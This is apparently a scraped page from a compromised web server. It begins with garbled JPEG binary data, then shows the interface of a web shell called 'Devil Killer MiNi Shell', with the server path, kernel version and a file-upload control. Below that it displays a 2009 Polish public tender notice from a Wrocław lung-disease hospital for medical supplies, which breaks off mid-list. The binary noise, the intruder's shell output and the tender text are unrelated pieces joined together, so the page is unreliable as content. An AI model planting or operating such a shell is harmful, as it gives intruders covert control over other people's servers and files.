JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090219/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090219/39869-N-2009.html

<p class="kh_header"><b>Wrocław: dostawa wyrobów medycznych z listy 32 pakietów w ilościach wynikających z bieżących potrzeb Zamawiającego w terminie dziewiętnastu miesięcy od dnia podpisania umowy transportem Wykonawcy lub na jego koszt.</b><br>
<b>Numer ogłoszenia: 39869 - 2009; data zamieszczenia: 19.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dolnośląskie Centrum Chorób Płuc we Wrocławiu , ul. Grabiszyńska 105, 53-439 Wrocław, woj. dolnośląskie, tel. 071 3349520, 410.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.dcchp.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b>  Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawa wyrobów medycznych z listy 32 pakietów w ilościach wynikających z bieżących potrzeb Zamawiającego w terminie dziewiętnastu miesięcy od dnia podpisania umowy transportem Wykonawcy lub na jego koszt..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa wyrobów medycznych z listy 32 pakietów w ilościach wynikających z bieżących potrzeb Zamawiającego w terminie dziewiętnastu miesięcy od dnia podpisania umowy transportem Wykonawcy lub na jego koszt..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 32.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 19.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> .   O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
-	posiadają uprawnienia do wykonywania określonej działalności lub czynności,  jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
-	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia lub przedstawią pisemnie zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
-	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
-	nie podlegają  wykluczeniu z postępowania o udzielenie zamówienia.
2.   Z postępowania o udzielenie zamówienia wyklucza się:
-	wykonawców, którzy wyrządzili szkodę, nie wykonując zamówienia lub wykonując je nienależycie, jeżeli szkoda ta została stwierdzona prawomocnym orzeczeniem sądu wydanym w okresie 3 lat przed wszczęciem postępowania;
-	wykonawców, w stosunku do których otwarto likwidację lub których upadłość ogłoszono, z  
wyjątkiem wykonawców, którzy po ogłoszeniu upadłości zawarli układ zatwierdzony prawomocnym postanowieniem sądu, jeżeli układ nie przewiduje zaspokojenia wierzycieli poprzez likwidację majątku upadłego;
-     wykonawców, którzy zalegają z uiszczeniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne, z wyjątkiem przypadków gdy uzyskali oni przewidziane prawem zwolnienie, odroczenie, rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
-     osoby fizyczne, które prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia publicznego, przestępstwo przeciwko prawom osób wykonujących prace zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
-	spółki jawne, których wspólnika prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia publicznego, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
-     spółki partnerskie, których partnera lub członka zarządu prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia publicznego, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału  w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
-	spółki komandytowe oraz spółki komandytowo-akcyjne, których komplementariusza prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia publicznego, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
-	osoby prawne, których urzędującego członka organu prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia publicznego, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
-     podmioty zbiorowe, wobec których sąd orzekł zakaz ubiegania się o zamówienia, na podstawie przepisów o odpowiedzialności podmiotów zbiorowych za czyny zabronione pod groźbą kary;  
-     wykonawców, którzy nie spełniają warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt. 1-3.
      Na podstawie art. 24 pkt 2 wyklucza się również wykonawców, którzy:
-	wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności, chyba, że udział tych wykonawców w postępowaniu nie utrudni uczciwej konkurencji:
-     złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania;
-	nie złożyli oświadczenia o spełnieniu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnienie tych warunków lub złożone dokumenty zawierają błędy z zastrzeżeniem art.26, ust. 3(nie uzupełnili dokumentów po wezwaniu przez Zamawiającego);
-     nie wnieśli wadium, w tym również na przedłużony okres związania ofertą, lub nie  zgodzili się na przedłużenie okresu związania ofertą
Spełnienie wymogów podanych  należy potwierdzić poprzez złożenie stosownych oświadczeń według załączników tj.: oświadczenie nr1 ( zał. nr 3 do SIWZ)  oraz oświadczenie nr 2 ( załącznik  nr 4 do SIWZ) oraz przedłożenie dokumentów, o których mowa w części VIII.
Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana wg formuły (spełnia - nie spełnia)..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Aktualny odpis z właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej. Dokument nie może być wydany wcześniej niż 6 m-cy od dnia otwarcia ofert. 
      Dokumenty wymagane w przypadku składania oferty wspólnej:
       - umowa regulująca współpracę podmiotów występujących wspólnie;
       - każdy z Wykonawców musi oddzielnie złożyć dokumenty i oświadczenia zawarte w punktach 3-6  oraz 8.
     Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składa dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania zgodnie z § 2 ust. 1 i 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 Dz. U. nr 86 poz. 605 z 24.05.2006r.
2.  Pełnomocnictwo do podpisania oferty. Pełnomocnictwo nie jest wymagane, jeżeli podpisujący  
     jest lub są właścicielami firmy i są oni wymienieni z imienia i nazwiska w odnośnym dokumencie 
     rejestracyjnym. W przypadku załączenia kserokopii pełnomocnictwa, winno ono być potwierdzone 
     za zgodność z oryginałem przez pełnomocnika. Zamawiający przed podpisaniem umowy zażąda do  
     wglądu oryginału lub notarialnie potwierdzonej kopii pełnomocnictwa. 
3.  Oświadczenie Wykonawcy nr 1 (załącznik nr 3 do SIWZ).
4.  Oświadczenie Wykonawcy nr 2 (załącznik nr 4 do SIWZ).
5.  Aktualne zaświadczenie z właściwego Urzędu Skarbowego o nie zaleganiu w uiszczaniu podatków Zaświadczenie nie może być wydane wcześniej niż 3 miesiące przed otwarciem ofert.
6.  Aktualne zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych o  nie zaleganiu w uiszczaniu składek na ubezpieczenie. Zaświadczenie nie może być wydane wcześniej niż 3 miesiące przed otwarciem ofert.
      Uwaga: Wykonawcy, którzy zalegają z uiszczeniem podatków, opłat lub składek na ubezpieczenie społeczne w przypadku, kiedy uzyskali przewidzianą prawem zgodę na zezwolenie, odroczenie lub rozłożenie na raty zaległości mogą brać udział w postępowaniu. 
7.   Zaakceptowany przez Wykonawcę wzór umowy (załącznik nr 2).
8.   Sprawozdanie finansowe albo jego część, a jeżeli podlega ono badaniu przez biegłego  
     rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym  
     sprawozdaniu albo jego części, a w przypadku Wykonawców niezobowiązanych (osoba fizyczna)do  
     sporządzania  sprawozdania finansowego innych dokumentów określających obroty oraz  
     zobowiązania i należności-za okres nie dłuższy niż ostatnie trzy lata obrotowe, a jeżeli okres  
     prowadzenia działalności jest krótszy-za ten okres.
     W przypadku wykonawcy, który jest osobą fizyczną, takim oficjalnym dokumentem wskazującym    
     na aktywa i pasywa, dochód, zysk, koszty działalności, straty czy zobowiązania finansowe w  
     zakresie prowadzonej działalności jest np. PIT 
9.  Próbki oraz  spis  przesłanych próbek tzn, próbki do pakietu  nr     szt 
10.  Aktualne świadectwa: potwierdzenie wpisu do rejestru wydane przez Urząd Rejestracji Produktów Leczniczych, Wyrobów Medycznych i Produktów  Biobójczych,  Deklaracja zgodności CE oraz certyfikat jednostki notyfikowanej jeśli klasa wyrobu na to wskazuje. 
      Świadectwa muszą być ważne przez cały czas trwania zamówienia.  W przypadku gdy dokument traci ważność podczas trwania zamówienia, Wykonawca musi załączyć do aktualnego dokumentu oświadczenie, że dostarczy przedłużenie dokumentu do siedziby Zamawiającego, niezwłocznie po jego wydaniu  przez właściwy organ.
     Za każdym formularzem asortymentowo-cenowym dotyczącym danego pakietu należy podłączyć świadectwa z adnotacją: pakiet nr
   Brak wymaganego oświadczenia Zamawiający będzie traktował jako nie spełnienie wymagań określonych w SIWZ.
11. W celu potwierdzenia, posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz 
      dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, 
      zamawiający żąda następujących dokumentów:
1)	wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, co najmniej 1 porównywalnej dostawy w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączenia dokumentów potwierdzających, że te dostawy zostały wykonane należycie- (potwierdzeniem mogą być referencje).
 12.  Wykonawca zobowiązany jest do dołączenia do składanej oferty dyskietki lub płyty CD z 
        formą elektroniczną Załącznika nr 1 do oferty: Formularz asortymentowo-cenowy, co umożliwi  
         szybsze i dokładniejsze sprawdzenie ofert pod względem rachunkowym..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 70</li>
<li>2 - przydatność(wartość użytkowa) - 30</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.dcchp.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dolnośląskie Centrum Chorób Płuc we Wrocławiu
Biuro Zamówień Publicznych(BZP)
Godziny pracy BZP: od poniedziałku do piątku w godz od 730 do 1505 
53-439 Wrocław ul. Grabiszyńska 105.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.02.2009 godzina 11:30, miejsce: Składanie ofert do dnia 26.02.09 godz. 1130. Ofertę wraz z próbkami należy złożyć w Sekretariacie siedziby Zamawiającego pokój nr 4 (wysoki pater)..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1-rurka dotchawicza do długotrwałej wentylacji:.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> rurka dotchawicza do długotrwałej wentylacji - sterylna, pojedynczo pakowana, opakowanie typu papier -folia, wykonana z termoplastycznego tworzywa (które mięknie pod wpływem temperatury ciała, pozwalając na dostosowanie się kształtu rurki do naturalnego kształtu dróg  oddechowych) z atraumatyczną końcówką, z otworem Murphyego. Mankiet wysoko objętościowy, cienkościenny o grubości ścianki mankietu mniejsza lub równa 50 mikron potwierdzona przez producenta w dokumentacji przetargowej. średnica mankietu dla rozmiaru rurek: nr 7 większa lub równa 28 mm, nr 8 wieksza lub równa 30 mm, nr 9wieksza lub równa 34 mm, nr 10wieksza lub równa34 mm.  Rozmiar:7,8,9,10.
Próbki w ilości :  2 sztuki z każdego rozmiaru.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 19.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. przydatność(wartość użytkowa) - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> PAKIET NR 2 - rurka Guedela ustno-gardłowa dla dorosłych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> rurka Guedela ustno-gardłowa dla dorosłych- jednorazowego użytku, sterylna lub biologicznie czysta, pojedynczo pakowana, jednoczęściowa, wykonana z twardego medycznego PCV (który nie może zmieniać kształtu i właściwości pod wpływem temperatury ciała), z łukowatą krzywizną, odpowiadającą krzywiźnie powierzchni języka, z brokerem zgryzu. Rozmiar rurki oznaczony kodem kolorystycznym.
Rozmiar: 2
Próbki w ilości :  2 sztuki ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 19.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. przydatność(wartość uzytkowa) - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> PAKIET NR 3  -  igła do talerza biodrowego.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> igły do nakłuwania talerza biodrowego - wykonane  z wysokogatunkowej stali chromowo-niklowanej,   nierdzewnej  nasadka igły z plastiku, sterylna, wielorazowego użytku, rozmiar:1,3x40(18Gx1,5). 
Próbki w ilości :  1 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 19.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. przydatność(wartość uzytkowa) - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> PAKIET NR 4 - elektrody do EKG.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> elektrody do EKG - uniwersalne, radioprzezierne, wykonane z pianki, samoprzylepne, łagodne dla skóry, przepuszczające powietrze, nie powodujące odparzeń, żelowane dobrze przylegające do skóry, odporne na zamoczenia (podczas mycia pacjenta lub u pacjenta z wysoką temperaturą ciała), posiadające zdzierak do naskórka, przystosowane do przewodów ekg z klipsami i nakładanymi zatrzaskami. Elektrody stosowane przy długotrwałym monitorowaniu pacjenta na OIOM - kilka dni. 
Próbki w ilości :  15 sztuk..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 19.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. przydatność(wartość uzytkowa) - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> PAKIET NR 5-  anestezjologiczne worki oddechowe.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> anestezjologiczne worki oddechowe - wykonane z lateksu kauczuku naturalnego, 
dł; 270- 300mm, szer; 125- 130 mm, pojemność 3 litry, niesterylne, wielokrotnego użytku.
Próbki w ilości : 1 sztuka ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 19.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. przydatność(wartość użytkowa) - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> PAKIET NR 6- maska chirurgiczna dla zespołu operacyjnego.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> maska chirurgiczna dla zespołu operacyjnego- jednorazowego użytku, płaska, wiązana, trójwarstwowa, nie powodująca podrażnień skóry, wodoodporna, zapewniająca doskonały komfort przy długotrwałych zabiegach operacyjnych oraz dobrą jakość oddychania, wykonana z lekkiego, miękkiego materiału, dobre przyleganie do twarzy.
Próbki w ilości : 1 opakowane ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 19.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. przydatność(wartość użytkowa) - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> PAKIET NR 7 -  WOREK  HEIMLICHA.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Worek HEIMLICHA ( zestaw) -  do drenażu biernego opłucnej, zestaw składa się z: strzykawki, worka, drenu z zastawką płatkową, sterylny, jednorazowego użytku, pojedynczo pakowany. 
Próbki w ilości:1 sztuka..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 19.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. przydatność(wartość użytkowa) - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> PAKIET NR 8 -  cewnik dotętniczy zakładany metodą SELDINGERA.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> cewnik dotętniczy zakładany metodą Seldingera do tętnicy udowej  -  wykonany z poliuretanu wysokiej jakości, igła ze ścięciem o niskim współczynniku tarcia. Prowadnica druciana dwustronna w kształcie J- z jednej strony, a z drugiej prosta. Skrzydełka mocujące niskoprofilowane. Sterylny, pojedynczo pakowany. Rozmiar:  18 G/długość od 100 do 200 mm. 
cewnik dotętniczy zakładany metodą Seldingera do tętnicy promieniowej- wykonany z poliuretanu wysokiej jakości, igła ze ścięciem o niskim współczynniku tarcia. Prowadnica druciana dwustronna w kształcie J - z jednej strony, a z drugiej prosta. Skrzydełka mocujące niskoprofilowane. Sterylny, pojedynczo pakowany. Rozmiar: 20G/długość od 50 do 80 mm;  
Próbki w ilości :  2 sztuki  z każdej pozycji  w pakiecie..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 19.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. przydatność(wartość użytkowa) - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> PAKIET NR 9-  intradrucery  przezskórne do żył i tętnic.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> intradrucery przezskórne  do żył i do tętnic. - sterylne, jednorazowego użytku, pojedynczo pakowane,  do tętnic oraz żył (z prowadnikiem), wyposażone w zastawkę hemostatyczną oraz port boczny do wlewów z kranikiem trójdrożnym, prowadnicą, rozszerzadło, zakładane techniką  Seldingera.
Próbki w ilości :  1 sztuka ..</li>
